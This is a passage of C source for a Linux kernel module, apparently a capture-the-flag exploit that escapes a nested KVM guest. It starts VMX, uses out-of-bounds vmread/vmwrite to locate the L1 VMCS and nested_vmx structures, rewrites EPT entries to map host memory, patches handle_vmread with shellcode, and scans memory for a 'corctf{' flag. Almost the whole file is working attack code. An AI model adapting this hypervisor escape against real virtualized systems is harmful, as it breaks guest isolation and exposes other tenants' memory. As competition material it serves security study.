        asm("mov %0, %%db7"    ::"r" (value));
        break;
    default:
        BUG();
    }
}

static noinline uint64_t read_cr3(void) {
    uint64_t val = 0;
        asm("mov %%cr3, %0" :"=r" (val));
    return val;
}

static noinline uint64_t read_guy(unsigned long offset) {
    uint64_t val = 0;

    uint64_t vmread_field = 0;
    uint64_t vmread_value = 0;

    native_set_debugreg(0, 0x1337babe);
    native_set_debugreg(1, offset);
    asm volatile( "vmread %[field], %[output]\n\t"
              : [output] "=r" (vmread_value)
              : [field] "r" (vmread_field) : );
    val = native_get_debugreg(2);

    return val;
}

static noinline void write_guy(unsigned long offset, unsigned long value) {
    uint64_t vmwrite_field = 0;
    uint64_t vmwrite_value = 0;

    native_set_debugreg(0, 0x1337babe);
    native_set_debugreg(1, offset);
    native_set_debugreg(2, value);
    asm volatile( "vmwrite %[value], %[field]\n\t"
          :
          : [field] "r" (vmwrite_field),
            [value] "r" (vmwrite_value) : );
}

#define IDT_BASE 0xfffffe0000000000ull

static noinline int find_l1_vmcs(uint64_t *l1_vmcs_offset) {
    unsigned long long pos_offset = 0, neg_offset = 0;
    uint64_t zero_val = 0, pos_val = 0, neg_val = 0;
    uint64_t found_val = 0, found_offset = 0;
    uint64_t i = 0;

    zero_val = read_guy(0ull);
    pr_info("vmcs12[0] = %llx\n", zero_val);

    // scan in each direction looking for the guest_idtr_base field of the l1 vm
    for (i = 0; i < 0x4000; i++) {
        // from attaching to the l1 guest, the address of guest_idtr_base always has 0x208 in the lower 3 nibbles
        pos_offset = ((i * 0x1000) + 0x208) / 8;
        neg_offset = ((i * -1 * 0x1000) + 0x208) / 8;

        pos_val = read_guy(pos_offset);
        if (pos_val == IDT_BASE) {
            found_val = pos_val;
            found_offset = pos_offset;
            break;
        }

        neg_val = read_guy(neg_offset);
        if (neg_val == IDT_BASE) {
            found_val = neg_val;
            found_offset = neg_offset;
            break;
        }

        if (i < 0x20) {
            pr_info("vmcs12[%llx * 8] = %llx\n", pos_offset, pos_val);
            pr_info("vmcs12[%llx * 8] = %llx\n", neg_offset, neg_val);
        }
    }
    if (found_val == 0) {
        pr_info("[exp]: IDT NOT FOUND :(\n");
        *l1_vmcs_offset = 0;
        return 0;
    } else {
        pr_info("[exp]: Found IDT in l1 at offset %lld; value: %llx\n", found_offset, found_val);
        *l1_vmcs_offset = found_offset;
        return 1;
    }
}

static noinline int find_nested_vmx(uint64_t *nested_vmx_offset) {
    // the nested_vmx struct contains two known values --
    //     the guest phys addrs of the vmxon_ptr and current_vmptr
    // finding this structure allows us to read the `cached_vmcs12` pointer
    // which is the host virtual address of our vmcs, based on that we can
    // figure out where we are at in the l1's virtual address space

    unsigned long long pos_offset = 0, neg_offset = 0;
    uint64_t zero_val = 0, pos_val = 0, neg_val = 0;
    uint64_t found_val = 0, found_offset = 0;
    uint64_t i = 0;

    zero_val = read_guy(0ull);
    pr_info("vmcs12[0] = %llx\n", zero_val);
    zero_val = read_guy(1ull);
    pr_info("vmcs12[1] = %llx\n", zero_val);
    zero_val = read_guy(0ull);
    pr_info("vmcs12[0] = %llx\n", zero_val);

    for (i = 1; i < (0x4000*0x200); i += 2) {
        pos_offset = i;
        neg_offset = -i;
        // seen: 0xe8 0x28 0x68

        pos_val = read_guy(pos_offset);
        if (pos_val == vmptrld_page_pa && read_guy(pos_offset-2) == vmxon_page_pa) {
            found_val = pos_val;
            found_offset = pos_offset;
            break;
        }

        // in practice negative offset is rare/impossible?
        // commented out bc it keeps going too far and crashing
        //neg_val = read_guy(neg_offset);
        //if (neg_val == vmptrld_page_pa && read_guy(neg_offset-2) == vmxon_page_pa) {
        //    found_val = neg_val;
        //    found_offset = neg_offset;
        //    break;
        //}

        if (i > 0x1000 && i < 0x2000) {
            pr_info("vmcs12[%llx * 8] = %llx\n", pos_offset, pos_val);
            //pr_info("vmcs12[%llx * 8] = %llx\n", neg_offset, neg_val);
        }
    }
    if (found_val == 0) {
        pr_info("[exp]: L1 VMCS NOT FOUND :(\n");
        *nested_vmx_offset = 0;
        return 0;
    } else {
        pr_info("[exp]: Found vmcs in l1 at offset %lld; value: %llx\n", found_offset, found_val);
        *nested_vmx_offset = found_offset;
        return 1;
    }
}

static int proc_open(struct inode *inode, struct file *filep) {
    uint64_t l1_vmcs_offset = 0;
    uint64_t nested_vmx_offset = 0;
    uint64_t l2_vmcs_addr = 0;

    uint64_t eptp_value = 0;
    uint64_t ept_offset = 0;
    uint64_t ept_addr = 0;

    uint64_t pml4e_value = 0;
    uint64_t pml4e_offset = 0;
    uint64_t pml4e_addr = 0;

    uint64_t *pgde_page = 0;
    uint64_t pgde_page_pa = 0;

    uint64_t l2_entry = 0;

    uint64_t physbase = 0;
    uint64_t cr3 = 0;
    uint64_t *pgd = 0;

    uint64_t handle_vmread_page = 0;
    uint8_t *handle_vmread = 0;

    uint64_t i;

    if (!find_l1_vmcs(&l1_vmcs_offset)) {
        return 0; // not found
    }

    if (!find_nested_vmx(&nested_vmx_offset)) {
        return 0; // not found
    }

    l2_vmcs_addr = read_guy(nested_vmx_offset+1);
    pr_info("[exp]: YOU ARE HERE: %llx\n", l2_vmcs_addr);

    physbase = l2_vmcs_addr & ~0xfffffffull;
    pr_info("[exp]: probably physbase: %llx\n", l2_vmcs_addr & ~0xfffffff);

    eptp_value = read_guy(l1_vmcs_offset-50);
    pr_info("[exp]: eptp_value: %llx\n", eptp_value);

    ept_addr = physbase + (eptp_value & ~0xfffull);
    pr_info("[exp]: ept_addr: %llx\n", ept_addr);

    ept_offset = (ept_addr-l2_vmcs_addr) / 8;
    pr_info("[exp]: ept_offset: %llx\n", ept_offset);

    // read first entry in ept to get the PML4E
    pml4e_value = read_guy(ept_offset);
    pr_info("[exp]: pml4e_value: %llx\n", pml4e_value);

    pml4e_addr = physbase + (pml4e_value & ~0xfffull);
    pr_info("[exp]: pml4e_addr: %llx\n", pml4e_addr);

    pml4e_offset = (pml4e_addr-l2_vmcs_addr) / 8;
    pr_info("[exp]: pml4e_offset: %llx\n", pml4e_offset);

    // at 6GB will be an identity mapping of the l1 memory in l2
    write_guy(pml4e_offset + 6, 0x987);

    cr3 = read_cr3();
    pgd = (cr3 & ~0xfffull) + page_offset_base;
    pr_info("[exp]: pgd: %llx\n", pgd);

    pgde_page = kzalloc(0x1000, GFP_KERNEL);
    pgde_page_pa = virt_to_phys(pgde_page);

    // sticking the l1 mapping at the PGD entry the LDT remap usually goes at cuz why not
    pgd[272] = pgde_page_pa | 0x7;

    // huge and rwxp
    l2_entry = 0x180000000 | (1<<7) | 0x3;

    pgde_page[0] = l2_entry;

    // in THEORY I can access memory at 0xffff880000000000 now
    pr_info("TEST: %llx\n", *((uint64_t *)0xffff880000000000));

    // look for 0x3ec6780f to find the page where handle_vmread is at
    for (i = 0; i < (1024ull << 20); i += 0x1000) {
        unsigned int val = *((unsigned int *)(0xffff880000000df8 + i));

        // check the value and check if relocations were applied
        if (val == 0x3ec6780f && *((unsigned int *)(0xffff880000000df8 + 0xb + i)) != 0) {
            handle_vmread_page = 0xffff880000000000 + i;
            break;
        }
    }

    pr_info("found handle_vmread page at: %llx\n", handle_vmread_page);

    handle_vmread = handle_vmread_page + 0x4d0;
    pr_info("handle_vmread at: %llx\n", handle_vmread);

    // I don't want to figure out the address of nested_vmx_succeeded so pad with nops just up to that call
    // and make the instruction just after nested_vmx_succeeded returns be ret
    memset(handle_vmread, 0x90, 0x281);
    handle_vmread[0x286] = 0xc3;

    // -1 to remove null terminator
    memcpy(handle_vmread, shellcode, sizeof(shellcode)-1);

    // do it
    read_guy(0);

    // scan for flag in memory
    for (i = 0; i < 1024ull << 20; i+= 0x1000) {
        if (!memcmp(0xffff880000000000 + i, "corctf{", 7)) {
            pr_info("flag: %s\n", 0xffff880000000000 + i);
            break;
        }
    }

    return 0;
}

static ssize_t proc_read(struct file* filep, char* __user buffer, size_t len, loff_t* offset) {
    return 0;
}

static ssize_t proc_write(struct file* filep, const char* __user u_buffer, size_t len, loff_t* offset) {
    return 0;
}

void __no_profile native_write_cr4(unsigned long val)
{
        unsigned long bits_changed = 0;
        asm volatile("mov %0,%%cr4": "+r" (val) : : "memory");
}

static inline int vmxon(uint64_t phys)
{
        uint8_t ret;

        __asm__ __volatile__ ("vmxon %[pa]; setna %[ret]"
                : [ret]"=rm"(ret)
                : [pa]"m"(phys)
                : "cc", "memory");

        return ret;
}

static inline int vmptrld(uint64_t vmcs_pa)
{
        uint8_t ret;

        __asm__ __volatile__ ("vmptrld %[pa]; setna %[ret]"
                : [ret]"=rm"(ret)
                : [pa]"m"(vmcs_pa)
                : "cc", "memory");

        return ret;
}


static inline uint64_t rdmsr_guy(uint32_t msr)
{
    uint32_t a, d;

    __asm__ __volatile__("rdmsr" : "=a"(a), "=d"(d) : "c"(msr) : "memory");

    return a | ((uint64_t) d << 32);
}


static inline uint32_t vmcs_revision(void)
{
    return rdmsr_guy(MSR_IA32_VMX_BASIC);
}

static int __init proc_init(void)
{
    void *vmxon_page, *vmptrld_page;
    struct proc_dir_entry *new;
    unsigned long cr4;
    int res;

    cr4 = native_read_cr4();
    cr4 |= 1ul << 13;
    native_write_cr4(cr4);

    pr_info("[exp]: set cr4 to %lx", cr4);
    vmxon_page = kzalloc(0x1000, GFP_KERNEL);
    vmptrld_page = kzalloc(0x1000, GFP_KERNEL);

    vmxon_page_pa = virt_to_phys(vmxon_page);
    vmptrld_page_pa = virt_to_phys(vmptrld_page);

    *(uint32_t *)(vmxon_page) = vmcs_revision();
    *(uint32_t *)(vmptrld_page) = vmcs_revision();

    res = vmxon(vmxon_page_pa);
    pr_info("[exp]: vmxon returned %d", res);

    res = vmptrld(vmptrld_page_pa);
    pr_info("[exp]: vmptrld returned %d", res);

    pr_info("[exp]: vmxon_pa %llx", vmxon_page_pa);
    pr_info("[exp]: vmptrld_pa %llx", vmptrld_page_pa);

    pr_info("page_offset_base: %lx\n", page_offset_base);

    new = proc_create("exp", 0777, NULL, &fops);
    pr_info("[exp]: init\n");
    return 0;
}

static void __exit proc_exit(void)
{
    remove_proc_entry("exp", NULL);
    pr_info("exp: exit\n");
}

module_init(proc_init);
module_exit(proc_exit);

MODULE_LICENSE("GPL");
MODULE_AUTHOR("zolutal");
MODULE_DESCRIPTION("bleh");
MODULE_VERSION("0.1");

